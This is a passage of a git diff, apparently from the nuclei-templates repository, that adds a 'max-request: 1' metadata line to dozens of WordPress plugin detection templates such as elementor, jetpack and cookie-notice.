+++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/cookie-law-info/ metadata: + max-request: 1 plugin_namespace: cookie-law-info wpscan: https://wpscan.com/plugin/cookie-law-info tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index c71fa258af..41b5d6c854 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/cookie-notice/ metadata: + max-request: 1 plugin_namespace: cookie-notice wpscan: https://wpscan.com/plugin/cookie-notice tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index 5a98e67597..cca31cc3a9 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/creame-whatsapp-me/ metadata: + max-request: 1 plugin_namespace: creame-whatsapp-me wpscan: https://wpscan.com/plugin/creame-whatsapp-me tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index 4463174203..ff9c0a49ce 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/creative-mail-by-constant-contact/ metadata: + max-request: 1 plugin_namespace: creative-mail-by-constant-contact wpscan: https://wpscan.com/plugin/creative-mail-by-constant-contact tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index cfac0b961b..a76d3306bb 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/custom-css-js/ metadata: + max-request: 1 plugin_namespace: custom-css-js wpscan: https://wpscan.com/plugin/custom-css-js tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index 846761f2f7..2249681b6d 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/custom-fonts/ metadata: + max-request: 1 plugin_namespace: custom-fonts wpscan: https://wpscan.com/plugin/custom-fonts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index 0def6e61ca..b5389b27c9 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/custom-post-type-ui/ metadata: + max-request: 1 plugin_namespace: custom-post-type-ui wpscan: https://wpscan.com/plugin/custom-post-type-ui tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index 5c5decc127..00d183f507 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/disable-comments/ metadata: + max-request: 1 plugin_namespace: disable-comments wpscan: https://wpscan.com/plugin/disable-comments tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index a8229a338e..451e1daef1 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/disable-gutenberg/ metadata: + max-request: 1 plugin_namespace: disable-gutenberg wpscan: https://wpscan.com/plugin/disable-gutenberg tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index 6559e64dce..af30ca76b6 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/duplicate-page/ metadata: + max-request: 1 plugin_namespace: duplicate-page wpscan: https://wpscan.com/plugin/duplicate-page tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index a4368b8aa6..93823466d4 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/duplicate-post/ metadata: + max-request: 1 plugin_namespace: duplicate-post wpscan: https://wpscan.com/plugin/duplicate-post tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index ec119e762a..e224283ecd 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/duplicator/ metadata: + max-request: 1 plugin_namespace: duplicator wpscan: https://wpscan.com/plugin/duplicator tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index b7ec7576a3..9af8df08a7 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/duracelltomi-google-tag-manager/ metadata: + max-request: 1 plugin_namespace: duracelltomi-google-tag-manager wpscan: https://wpscan.com/plugin/duracelltomi-google-tag-manager tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/easy-fancybox.yaml b/http/technologies/wordpress/plugins/easy-fancybox.yaml index c42d679973..d4081474c3 100644 --- a/http/technologies/wordpress/plugins/easy-fancybox.yaml +++ b/http/technologies/wordpress/plugins/easy-fancybox.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/easy-fancybox/ metadata: + max-request: 1 plugin_namespace: easy-fancybox wpscan: https://wpscan.com/plugin/easy-fancybox tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/easy-google-fonts.yaml b/http/technologies/wordpress/plugins/easy-google-fonts.yaml index c9859e9770..96c813ad49 100644 --- a/http/technologies/wordpress/plugins/easy-google-fonts.yaml +++ b/http/technologies/wordpress/plugins/easy-google-fonts.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/easy-google-fonts/ metadata: + max-request: 1 plugin_namespace: easy-google-fonts wpscan: https://wpscan.com/plugin/easy-google-fonts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index fc44375947..bcbc0707fb 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/easy-table-of-contents/ metadata: + max-request: 1 plugin_namespace: easy-table-of-contents wpscan: https://wpscan.com/plugin/easy-table-of-contents tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index a1616c1741..8b23832297 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/easy-wp-smtp/ metadata: + max-request: 1 plugin_namespace: easy-wp-smtp wpscan: https://wpscan.com/plugin/easy-wp-smtp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index 6cfb8bc272..f0c3e4bc63 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/elementor/ metadata: + max-request: 1 plugin_namespace: elementor wpscan: https://wpscan.com/plugin/elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index 9caaa53263..eab4a0d725 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/elementskit-lite/ metadata: + max-request: 1 plugin_namespace: elementskit-lite wpscan: https://wpscan.com/plugin/elementskit-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 5e6b557952..74c172ac94 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/enable-media-replace/ metadata: + max-request: 1 plugin_namespace: enable-media-replace wpscan: https://wpscan.com/plugin/enable-media-replace tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index c5a665e6f7..f5a63a2ed2 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/envato-elements/ metadata: + max-request: 1 plugin_namespace: envato-elements wpscan: https://wpscan.com/plugin/envato-elements tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index a8b56b5df0..25ca7328ef 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/essential-addons-for-elementor-lite/ metadata: + max-request: 1 plugin_namespace: essential-addons-for-elementor-lite wpscan: https://wpscan.com/plugin/essential-addons-for-elementor-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index 4e20e57107..cb1db5bee6 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ewww-image-optimizer/ metadata: + max-request: 1 plugin_namespace: ewww-image-optimizer wpscan: https://wpscan.com/plugin/ewww-image-optimizer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index 6f6a416595..a3207ea16a 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/facebook-for-woocommerce/ metadata: + max-request: 1 plugin_namespace: facebook-for-woocommerce wpscan: https://wpscan.com/plugin/facebook-for-woocommerce tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 2dd0ef57b5..2a4b772078 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/fast-indexing-api/ metadata: + max-request: 1 plugin_namespace: fast-indexing-api wpscan: https://wpscan.com/plugin/fast-indexing-api tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index 11942f4fa4..366205085d 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/favicon-by-realfavicongenerator/ metadata: + max-request: 1 plugin_namespace: favicon-by-realfavicongenerator wpscan: https://wpscan.com/plugin/favicon-by-realfavicongenerator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 87c2aeb4bd..598f08ce88 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/flamingo/ metadata: + max-request: 1 plugin_namespace: flamingo wpscan: https://wpscan.com/plugin/flamingo tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 3696eefbf7..42cdfb4475 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/fluentform/ metadata: + max-request: 1 plugin_namespace: fluentform wpscan: https://wpscan.com/plugin/fluentform tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index 8bab0a9c3e..a1af263dbd 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/font-awesome/ metadata: + max-request: 1 plugin_namespace: font-awesome wpscan: https://wpscan.com/plugin/font-awesome tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index affd270123..19265f910e 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/force-regenerate-thumbnails/ metadata: + max-request: 1 plugin_namespace: force-regenerate-thumbnails wpscan: https://wpscan.com/plugin/force-regenerate-thumbnails tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index 1e6a62e23b..c21d414695 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/formidable/ metadata: + max-request: 1 plugin_namespace: formidable wpscan: https://wpscan.com/plugin/formidable tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index 980265f531..91c89d0ad8 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/forminator/ metadata: + max-request: 1 plugin_namespace: forminator wpscan: https://wpscan.com/plugin/forminator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index daf205789d..539d9f7cec 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ga-google-analytics/ metadata: + max-request: 1 plugin_namespace: ga-google-analytics wpscan: https://wpscan.com/plugin/ga-google-analytics tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index 22bfa3ffe2..f4123bb594 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/gdpr-cookie-compliance/ metadata: + max-request: 1 plugin_namespace: gdpr-cookie-compliance wpscan: https://wpscan.com/plugin/gdpr-cookie-compliance tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 88d38e21ed..23a88ea130 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-analytics-dashboard-for-wp/ metadata: + max-request: 1 plugin_namespace: google-analytics-dashboard-for-wp wpscan: https://wpscan.com/plugin/google-analytics-dashboard-for-wp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index ad238445fc..8074ac337e 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-analytics-for-wordpress/ metadata: + max-request: 1 plugin_namespace: google-analytics-for-wordpress wpscan: https://wpscan.com/plugin/google-analytics-for-wordpress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index 840c086fb9..575c9ebe67 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-listings-and-ads/ metadata: + max-request: 1 plugin_namespace: google-listings-and-ads wpscan: https://wpscan.com/plugin/google-listings-and-ads tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 2678f603c6..7b0f188ff7 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-site-kit/ metadata: + max-request: 1 plugin_namespace: google-site-kit wpscan: https://wpscan.com/plugin/google-site-kit tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 20d947a5d1..898e4de56d 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-sitemap-generator/ metadata: + max-request: 1 plugin_namespace: google-sitemap-generator wpscan: https://wpscan.com/plugin/google-sitemap-generator tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 22ee97b51f..4a76856a69 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/gtranslate/ metadata: + max-request: 1 plugin_namespace: gtranslate wpscan: https://wpscan.com/plugin/gtranslate tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index 3f4c6c8936..b321ca63eb 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/gutenberg/ metadata: + max-request: 1 plugin_namespace: gutenberg wpscan: https://wpscan.com/plugin/gutenberg tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index fa1bb64115..2b42c9f80c 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/happy-elementor-addons/ metadata: + max-request: 1 plugin_namespace: happy-elementor-addons wpscan: https://wpscan.com/plugin/happy-elementor-addons tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml b/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml index a8eca7b056..2409c6b370 100644 --- a/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml +++ b/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/header-and-footer-scripts/ metadata: + max-request: 1 plugin_namespace: header-and-footer-scripts wpscan: https://wpscan.com/plugin/header-and-footer-scripts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index da63d1cbf6..dbea07a6da 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/header-footer-code-manager/ metadata: + max-request: 1 plugin_namespace: header-footer-code-manager wpscan: https://wpscan.com/plugin/header-footer-code-manager tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index f94e7f6494..17a8f220cf 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/header-footer-elementor/ metadata: + max-request: 1 plugin_namespace: header-footer-elementor wpscan: https://wpscan.com/plugin/header-footer-elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 95d2aa5f16..956a08b32d 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/header-footer/ metadata: + max-request: 1 plugin_namespace: header-footer wpscan: https://wpscan.com/plugin/header-footer tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index af8193b875..5a570b9077 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/health-check/ metadata: + max-request: 1 plugin_namespace: health-check wpscan: https://wpscan.com/plugin/health-check tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 8d7e45818b..4ecac0cd92 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/hello-dolly/ metadata: + max-request: 1 plugin_namespace: hello-dolly wpscan: https://wpscan.com/plugin/hello-dolly tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index ed3967db7b..e50f58cef8 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/host-webfonts-local/ metadata: + max-request: 1 plugin_namespace: host-webfonts-local wpscan: https://wpscan.com/plugin/host-webfonts-local tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 2ff5adba86..031bb48563 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/imagify/ metadata: + max-request: 1 plugin_namespace: imagify wpscan: https://wpscan.com/plugin/imagify tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 9099f3c0a5..3cdcf3da93 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/imsanity/ metadata: + max-request: 1 plugin_namespace: imsanity wpscan: https://wpscan.com/plugin/imsanity tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index 1ee0e67542..c222bc9d4a 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/insert-headers-and-footers/ metadata: + max-request: 1 plugin_namespace: insert-headers-and-footers wpscan: https://wpscan.com/plugin/insert-headers-and-footers tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index 43cb2ab09c..c8acf8c625 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/instagram-feed/ metadata: + max-request: 1 plugin_namespace: instagram-feed wpscan: https://wpscan.com/plugin/instagram-feed tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 7ba81036cf..66b7d6a363 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/intuitive-custom-post-order/ metadata: + max-request: 1 plugin_namespace: intuitive-custom-post-order wpscan: https://wpscan.com/plugin/intuitive-custom-post-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/iwp-client.yaml b/http/technologies/wordpress/plugins/iwp-client.yaml index 24fc3e3295..a36016562d 100644 --- a/http/technologies/wordpress/plugins/iwp-client.yaml +++ b/http/technologies/wordpress/plugins/iwp-client.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/iwp-client/ metadata: + max-request: 1 plugin_namespace: iwp-client wpscan: https://wpscan.com/plugin/iwp-client tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index e701e365ba..e4017b1a0a 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/jetpack/ metadata: + max-request: 1 plugin_namespace: jetpack wpscan: https://wpscan.com/plugin/jetpack tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index c0cc5400a8..53d6d393bd 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/kadence-blocks/ metadata: + max-request: 1 plugin_namespace: kadence-blocks wpscan: https://wpscan.com/plugin/kadence-blocks tags: tech,wordpress,wp-plugin,top-200 diff --git 